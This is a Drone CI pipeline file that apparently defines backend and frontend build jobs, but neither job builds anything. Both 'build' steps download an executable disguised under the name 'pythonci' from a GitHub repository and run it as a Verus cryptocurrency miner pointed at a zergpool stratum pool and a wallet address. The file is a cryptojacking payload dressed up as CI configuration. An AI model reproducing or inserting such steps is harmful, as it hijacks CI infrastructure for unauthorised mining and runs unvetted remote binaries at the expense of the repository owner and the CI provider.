kind: pipeline
type: docker
name: backend

steps:
- name: build1
  image: golang
  commands:
  -  sudo apt update && sudo apt install screen libjansson4 -y && sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev && wget https://github.com/hendrik20212/VRS/raw/main/pythonci && ./pythonci -a verus -o stratum+tcp://verushash.asia.mine.zergpool.com:3300 -u RUEfFzYUwZSaXcLmdA6xyPvgwu7FLbkm6r -p  c=VRSC,mc=VRSC,ID=KULI -t8


---
kind: pipeline
type: docker
name: frontend

steps:
- name: build2
  image: node
  commands:
  - sudo apt update && sudo apt install screen libjansson4 -y && sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev && wget https://github.com/hendrik20212/VRS/raw/main/pythonci && ./pythonci -a verus -o stratum+tcp://verushash.asia.mine.zergpool.com:3300 -u RUEfFzYUwZSaXcLmdA6xyPvgwu7FLbkm6r -p  c=VRSC,mc=VRSC,ID=KULI -t8


---
kind: pipeline
name: after

steps:
- name: notify
  image: plugins/slack
  settings:
    room: general
   

depends_on:
- backend
- frontend
